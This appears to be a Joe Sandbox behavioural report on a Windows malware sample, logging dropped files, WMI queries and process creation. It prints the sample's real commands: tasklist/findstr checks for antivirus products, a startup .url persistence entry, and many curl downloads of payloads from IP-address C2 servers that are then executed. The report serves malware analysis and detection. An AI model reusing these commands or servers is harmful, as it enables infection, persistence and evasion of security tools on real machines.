Source: C:\Users\user\AppData\Local\Temp\768032\Finish.com File created: C:\Users\user\AppData\Roaming\DolphinDumps\xhwq.zip entropy: 7.99812683975
Source: C:\Users\user\AppData\Local\Temp\RevenueDevices.exe File created: C:\Users\user\AppData\Local\Temp\Showcase entropy: 7.99817987302
Source: C:\Users\user\AppData\Local\Temp\RevenueDevices.exe File created: C:\Users\user\AppData\Local\Temp\Parts entropy: 7.99745443978
Source: C:\Users\user\AppData\Local\Temp\RevenueDevices.exe File created: C:\Users\user\AppData\Local\Temp\Bailey entropy: 7.99784242676
Source: C:\Users\user\AppData\Local\Temp\RevenueDevices.exe File created: C:\Users\user\AppData\Local\Temp\Samples entropy: 7.99803767944
Source: C:\Users\user\AppData\Local\Temp\RevenueDevices.exe File created: C:\Users\user\AppData\Local\Temp\Considerations entropy: 7.99749833976
Source: C:\Users\user\AppData\Local\Temp\RevenueDevices.exe File created: C:\Users\user\AppData\Local\Temp\Shepherd entropy: 7.99642551519
Source: C:\Users\user\AppData\Local\Temp\RevenueDevices.exe File created: C:\Users\user\AppData\Local\Temp\Eight entropy: 7.99641122578
Source: C:\Users\user\AppData\Local\Temp\RevenueDevices.exe File created: C:\Users\user\AppData\Local\Temp\Norman entropy: 7.99777953585
Source: curl.exe Process created: 51
Source: cmd.exe Process created: 60

System Summary

Source: C:\Windows\System32\wscript.exe COM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}
Source: C:\Windows\SysWOW64\systeminfo.exe WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetStringValue
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_004038AF EntryPoint,#17,SetErrorMode,OleInitialize,SHGetFileInfoW,GetCommandLineW,GetModuleHandleW,CharNextW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,DeleteFileW,CoUninitialize,ExitProcess,lstrcatW,lstrcmpiW,CreateDirectoryW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,GetCurrentProcess,ExitWindowsEx, 0_2_004038AF
Source: C:\Users\user\AppData\Local\Temp\RevenueDevices.exe Code function: 88_2_00403883 EntryPoint,#17,SetErrorMode,OleInitialize,SHGetFileInfoW,GetCommandLineW,GetModuleHandleW,CharNextW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,DeleteFileW,CoUninitialize,ExitProcess,lstrcatW,lstrcmpiW,CreateDirectoryW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,GetCurrentProcess,ExitWindowsEx, 88_2_00403883
Source: C:\Users\user\Desktop\file.exe File created: C:\Windows\ThouRevolution
Source: C:\Users\user\AppData\Local\Temp\RevenueDevices.exe File created: C:\Windows\TmpMoon
Source: C:\Users\user\AppData\Local\Temp\RevenueDevices.exe File created: C:\Windows\NotifiedAaron
Source: C:\Users\user\AppData\Local\Temp\RevenueDevices.exe File created: C:\Windows\BrushSub
Source: C:\Users\user\AppData\Local\Temp\RevenueDevices.exe File created: C:\Windows\McLol
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_0040737E 0_2_0040737E
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00406EFE 0_2_00406EFE
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_004079A2 0_2_004079A2
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_004049A8 0_2_004049A8
Source: C:\Users\user\AppData\Roaming\DolphinDumps\azvw.exe Code function: 52_2_00408850 52_2_00408850
Source: C:\Users\user\AppData\Roaming\DolphinDumps\azvw.exe Code function: 52_2_0040C820 52_2_0040C820
Source: C:\Users\user\AppData\Roaming\DolphinDumps\azvw.exe Code function: 52_2_00403490 52_2_00403490
Source: C:\Users\user\AppData\Roaming\DolphinDumps\azvw.exe Code function: 52_2_00411170 52_2_00411170
Source: C:\Users\user\AppData\Roaming\DolphinDumps\azvw.exe Code function: 52_2_0040E900 52_2_0040E900
Source: C:\Users\user\AppData\Roaming\DolphinDumps\azvw.exe Code function: 52_2_0040CE49 52_2_0040CE49
Source: C:\Users\user\AppData\Roaming\DolphinDumps\azvw.exe Code function: 52_2_0040CE50 52_2_0040CE50
Source: C:\Users\user\AppData\Roaming\DolphinDumps\azvw.exe Code function: 52_2_00402210 52_2_00402210
Source: C:\Users\user\AppData\Roaming\DolphinDumps\azvw.exe Code function: 52_2_00408EC0 52_2_00408EC0
Source: C:\Users\user\AppData\Roaming\DolphinDumps\azvw.exe Code function: 52_2_00417EE3 52_2_00417EE3
Source: C:\Users\user\AppData\Roaming\DolphinDumps\azvw.exe Code function: 52_2_00402EF0 52_2_00402EF0
Source: C:\Users\user\AppData\Roaming\DolphinDumps\azvw.exe Code function: 52_2_0040F280 52_2_0040F280
Source: C:\Users\user\AppData\Roaming\DolphinDumps\azvw.exe Code function: 52_2_00409FD0 52_2_00409FD0
Source: C:\Users\user\AppData\Roaming\DolphinDumps\azvw.exe Code function: 52_2_004093E0 52_2_004093E0
Source: C:\Users\user\AppData\Local\Temp\RevenueDevices.exe Code function: 88_2_0040497C 88_2_0040497C
Source: C:\Users\user\AppData\Local\Temp\RevenueDevices.exe Code function: 88_2_00406ED2 88_2_00406ED2
Source: C:\Users\user\AppData\Local\Temp\RevenueDevices.exe Code function: 88_2_004074BB 88_2_004074BB
Source: Joe Sandbox View Dropped File: C:\Users\user\AppData\Local\InnoSphere Dynamics\InnoSphere.scr 1300262A9D6BB6FCBEFC0D299CCE194435790E70B9C7B4A651E202E90A32FD49
Source: C:\Users\user\Desktop\file.exe Code function: String function: 004062CF appears 57 times
Source: C:\Users\user\AppData\Local\Temp\RevenueDevices.exe Code function: String function: 004062A3 appears 58 times
Source: C:\Users\user\AppData\Roaming\DolphinDumps\azvw.exe Code function: String function: 00412920 appears 282 times
Source: C:\Users\user\AppData\Roaming\DolphinDumps\azvw.exe Code function: String function: 00406640 appears 48 times
Source: file.exe Static PE information: invalid certificate
Source: PsInfo.exe.52.dr Static PE information: Resource name: BINRES type: PE32 executable (console) Intel 80386, for MS Windows
Source: PsInfo64.exe.52.dr Static PE information: Resource name: BINRES type: PE32+ executable (console) x86-64, for MS Windows
Source: file.exe, 00000000.00000002.2037421930.00000000006E7000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenameCmd.Exej% vs file.exe
Source: file.exe, 00000000.00000003.2036612746.00000000006E7000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenameCmd.Exej% vs file.exe
Source: file.exe Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: classification engine Classification label: mal100.rans.spre.expl.evad.winEXE@323/65@3/2
Source: C:\Users\user\AppData\Roaming\DolphinDumps\azvw.exe Code function: 52_2_00412830 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,LookupPrivilegeValueA,GetLastError,AdjustTokenPrivileges,AdjustTokenPrivileges,GetLastError,CloseHandle,LookupPrivilegeValueA,AdjustTokenPrivileges,GetLastError,CloseHandle, 52_2_00412830
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_004044D1 GetDlgItem,GetDlgItem,IsDlgButtonChecked,GetDlgItem,GetAsyncKeyState,GetDlgItem,ShowWindow,SetWindowTextW,SHBrowseForFolderW,CoTaskMemFree,lstrcmpiW,lstrcatW,SetDlgItemTextW,GetDiskFreeSpaceW,MulDiv,SetDlgItemTextW, 0_2_004044D1
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_004024FB CoCreateInstance, 0_2_004024FB
Source: C:\Users\user\AppData\Local\Temp\768032\Finish.com File created: C:\Users\user\AppData\Local\InnoSphere Dynamics
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1772:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2364:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6676:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6508:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4320:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1440:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3208:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4824:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1536:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3536:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6660:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3440:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5276:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2764:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6616:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4280:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1396:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6220:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3792:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1560:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1652:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6532:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3160:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3148:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4024:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6816:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7120:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4980:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:736:120:WilError_03
Source: C:\Users\user\Desktop\file.exe File created: C:\Users\user\AppData\Local\Temp\nskE4F6.tmp
Source: file.exe Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: C:\Windows\SysWOW64\tasklist.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
Source: C:\Windows\SysWOW64\tasklist.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
Source: C:\Windows\SysWOW64\systeminfo.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\SysWOW64\systeminfo.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\Desktop\file.exe File read: C:\Users\desktop.ini
Source: C:\Users\user\Desktop\file.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: C:\Users\user\Desktop\file.exe File read: C:\Users\user\Desktop\file.exe
Source: unknown Process created: C:\Users\user\Desktop\file.exe "C:\Users\user\Desktop\file.exe"
Source: C:\Users\user\Desktop\file.exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c copy Feeling Feeling.cmd && Feeling.cmd
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\tasklist.exe tasklist
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\findstr.exe findstr /I "wrsa opssvc"
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\tasklist.exe tasklist
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\findstr.exe findstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth"
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd /c md 768032
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd /c copy /b ..\Howard + ..\Los + ..\Become + ..\Mental + ..\Vermont + ..\Bt + ..\Vatican G
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Users\user\AppData\Local\Temp\768032\Finish.com Finish.com G
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\choice.exe choice /d y /t 5
Source: C:\Users\user\AppData\Local\Temp\768032\Finish.com Process created: C:\Windows\SysWOW64\cmd.exe cmd /k echo [InternetShortcut] > "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\InnoSphere.url" & echo URL="C:\Users\user\AppData\Local\InnoSphere Dynamics\InnoSphere.js" >> "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\InnoSphere.url" & exit
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown Process created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\InnoSphere Dynamics\InnoSphere.js"
Source: C:\Windows\System32\wscript.exe Process created: C:\Users\user\AppData\Local\InnoSphere Dynamics\InnoSphere.scr "C:\Users\user\AppData\Local\InnoSphere Dynamics\InnoSphere.scr" "C:\Users\user\AppData\Local\InnoSphere Dynamics\l"
Source: C:\Users\user\AppData\Local\Temp\768032\Finish.com Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /C WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntiVirusProduct Get displayName > C:\Users\user\AppData\Local\temp\407 2>&1
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\wbem\WMIC.exe WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntiVirusProduct Get displayName
Source: C:\Users\user\AppData\Local\Temp\768032\Finish.com Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /C type C:\Users\user\AppData\Local\temp\407 > C:\Users\user\AppData\Local\temp\403
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\768032\Finish.com Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /C curl -s -o "C:\Users\user\AppData\Local\temp\tewjy" "178.215.224.252/v10/ukyh.php?jspo=6"
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\curl.exe curl -s -o "C:\Users\user\AppData\Local\temp\tewjy" "178.215.224.252/v10/ukyh.php?jspo=6"
Source: C:\Users\user\AppData\Local\Temp\768032\Finish.com Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /C curl -s -o "C:\Users\user\AppData\Local\temp\sihmk" "178.215.224.74/v10/ukyh.php?jspo=6"
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\curl.exe curl -s -o "C:\Users\user\AppData\Local\temp\sihmk" "178.215.224.74/v10/ukyh.php?jspo=6"
Source: C:\Users\user\AppData\Local\Temp\768032\Finish.com Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /C curl -s -o "C:\Users\user\AppData\Local\temp\ekcal" "178.215.224.74/v10/ukyh.php?jspo=5"
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\curl.exe curl -s -o "C:\Users\user\AppData\Local\temp\ekcal" "178.215.224.74/v10/ukyh.php?jspo=5"
Source: C:\Users\user\AppData\Local\Temp\768032\Finish.com Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /C curl -s -o "C:\Users\user\AppData\Local\temp\vuevs" "178.215.224.74/v10/ukyh.php?jspo=6"
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\curl.exe curl -s -o "C:\Users\user\AppData\Local\temp\vuevs" "178.215.224.74/v10/ukyh.php?jspo=6"
Source: C:\Users\user\AppData\Local\Temp\768032\Finish.com Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /C curl -s -o "C:\Users\user\AppData\Local\temp\fsqyf" "178.215.224.74/v10/ukyh.php?jspo=6"
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\curl.exe curl -s -o "C:\Users\user\AppData\Local\temp\fsqyf" "178.215.224.74/v10/ukyh.php?jspo=6"
Source: C:\Users\user\AppData\Local\Temp\768032\Finish.com Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /C curl -s -o "C:\Users\user\AppData\Local\temp\dmgfe" "178.215.224.74/v10/ukyh.php?jspo=35&xvgj=YXp2dy5leGU%3D"
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\curl.exe curl -s -o "C:\Users\user\AppData\Local\temp\dmgfe" "178.215.224.74/v10/ukyh.php?jspo=35&xvgj=YXp2dy5leGU%3D"
Source: C:\Users\user\AppData\Local\Temp\768032\Finish.com Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /C curl -s -o "C:\Users\user\AppData\Local\temp\woejq" "178.215.224.74/v10/ukyh.php?jspo=6"
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\curl.exe curl -s -o "C:\Users\user\AppData\Local\temp\woejq" "178.215.224.74/v10/ukyh.php?jspo=6"
Source: C:\Users\user\AppData\Local\Temp\768032\Finish.com Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /C curl -s -o "C:\Users\user\AppData\Local\temp\xvway" "178.215.224.74/v10/ukyh.php?jspo=6"
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\curl.exe curl -s -o "C:\Users\user\AppData\Local\temp\xvway" "178.215.224.74/v10/ukyh.php?jspo=6"
Source: C:\Users\user\AppData\Local\Temp\768032\Finish.com Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /C curl -s -o "C:\Users\user\AppData\Local\temp\tlbry" "178.215.224.74/v10/ukyh.php?jspo=35&xvgj=eGh3cS56aXA%3D"
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\curl.exe curl -s -o "C:\Users\user\AppData\Local\temp\tlbry" "178.215.224.74/v10/ukyh.php?jspo=35&xvgj=eGh3cS56aXA%3D"
Source: C:\Users\user\AppData\Local\Temp\768032\Finish.com Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /C cd "C:\Users\user\AppData\Roaming\DolphinDumps" & azvw.exe -o xhwq.zip
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Users\user\AppData\Roaming\DolphinDumps\azvw.exe azvw.exe -o xhwq.zip
Source: C:\Users\user\AppData\Local\Temp\768032\Finish.com Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /C curl -s -o "C:\Users\user\AppData\Local\temp\sirxu" "178.215.224.74/v10/ukyh.php?jspo=6"
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\curl.exe curl -s -o "C:\Users\user\AppData\Local\temp\sirxu" "178.215.224.74/v10/ukyh.php?jspo=6"
Source: C:\Users\user\AppData\Local\Temp\768032\Finish.com Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /C curl -s -o "C:\Users\user\AppData\Local\temp\gtnez" "178.215.224.74/v10/ukyh.php?jspo=31"
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\curl.exe curl -s -o "C:\Users\user\AppData\Local\temp\gtnez" "178.215.224.74/v10/ukyh.php?jspo=31"
Source: C:\Users\user\AppData\Local\Temp\768032\Finish.com Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /C systeminfo | findstr /C:"OS Name" > C:\Users\user\AppData\Roaming\DolphinDumps\jvx 2>&1
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\systeminfo.exe systeminfo
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\findstr.exe findstr /C:"OS Name"
Source: C:\Windows\SysWOW64\systeminfo.exe Process created: C:\Windows\SysWOW64\wbem\WmiPrvSE.exe C:\Windows\sysWOW64\wbem\wmiprvse.exe -secured -Embedding
Source: C:\Users\user\AppData\Local\Temp\768032\Finish.com Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /C curl -s -o "C:\Users\user\AppData\Local\temp\gfdap" "178.215.224.74/v10/ukyh.php?jspo=6"
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\curl.exe curl -s -o "C:\Users\user\AppData\Local\temp\gfdap" "178.215.224.74/v10/ukyh.php?jspo=6"
Source: C:\Users\user\AppData\Local\Temp\768032\Finish.com Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /C curl -s -o "C:\Users\user\AppData\Local\temp\gjmcf" "178.215.224.74/v10/ukyh.php?jspo=6"
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\curl.exe curl -s -o "C:\Users\user\AppData\Local\temp\gjmcf" "178.215.224.74/v10/ukyh.php?jspo=6"
Source: C:\Users\user\AppData\Local\Temp\768032\Finish.com Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /C curl -s -o "C:\Users\user\AppData\Local\temp\lkufr" "178.215.224.74/v10/ukyh.php?jspo=7"
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\curl.exe curl -s -o "C:\Users\user\AppData\Local\temp\lkufr" "178.215.224.74/v10/ukyh.php?jspo=7"
Source: C:\Users\user\AppData\Local\Temp\768032\Finish.com Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /C curl -s -o "C:\Users\user\AppData\Local\temp\slpug" "178.215.224.74/v10/ukyh.php?jspo=6"
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\curl.exe curl -s -o "C:\Users\user\AppData\Local\temp\slpug" "178.215.224.74/v10/ukyh.php?jspo=6"
Source: C:\Users\user\AppData\Local\Temp\768032\Finish.com Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /C curl -s -o "C:\Users\user\AppData\Local\temp\ixhzf" "178.215.224.74/v10/ukyh.php?jspo=10&melq=1"
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\curl.exe curl -s -o "C:\Users\user\AppData\Local\temp\ixhzf" "178.215.224.74/v10/ukyh.php?jspo=10&melq=1"
Source: C:\Users\user\AppData\Local\Temp\768032\Finish.com Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /C curl -s -o "C:\Users\user\AppData\Local\temp\qhiwq" "178.215.224.74/v10/ukyh.php?jspo=6"
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\curl.exe curl -s -o "C:\Users\user\AppData\Local\temp\qhiwq" "178.215.224.74/v10/ukyh.php?jspo=6"
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\curl.exe curl -s -o "C:\Users\user\AppData\Local\temp\ypalg" "178.215.224.74/v10/ukyh.php?jspo=6"
Source: C:\Users\user\AppData\Local\Temp\768032\Finish.com Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /C curl -s -o "C:\Users\user\AppData\Local\temp\cbmaa" "178.215.224.74/v10/ukyh.php?jspo=35&xvgj=UmV2ZW51ZURldmljZXMuZXhl"
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\curl.exe curl -s -o "C:\Users\user\AppData\Local\temp\cbmaa" "178.215.224.74/v10/ukyh.php?jspo=35&xvgj=UmV2ZW51ZURldmljZXMuZXhl"
Source: C:\Users\user\AppData\Local\Temp\768032\Finish.com Process created: C:\Users\user\AppData\Local\Temp\RevenueDevices.exe "C:\Users\user\AppData\Local\temp\RevenueDevices.exe"
Source: C:\Users\user\AppData\Local\Temp\768032\Finish.com Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /C curl -s -o "C:\Users\user\AppData\Local\temp\hzpaz" "178.215.224.74/v10/ukyh.php?jspo=6"
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\curl.exe curl -s -o "C:\Users\user\AppData\Local\temp\hzpaz" "178.215.224.74/v10/ukyh.php?jspo=6"
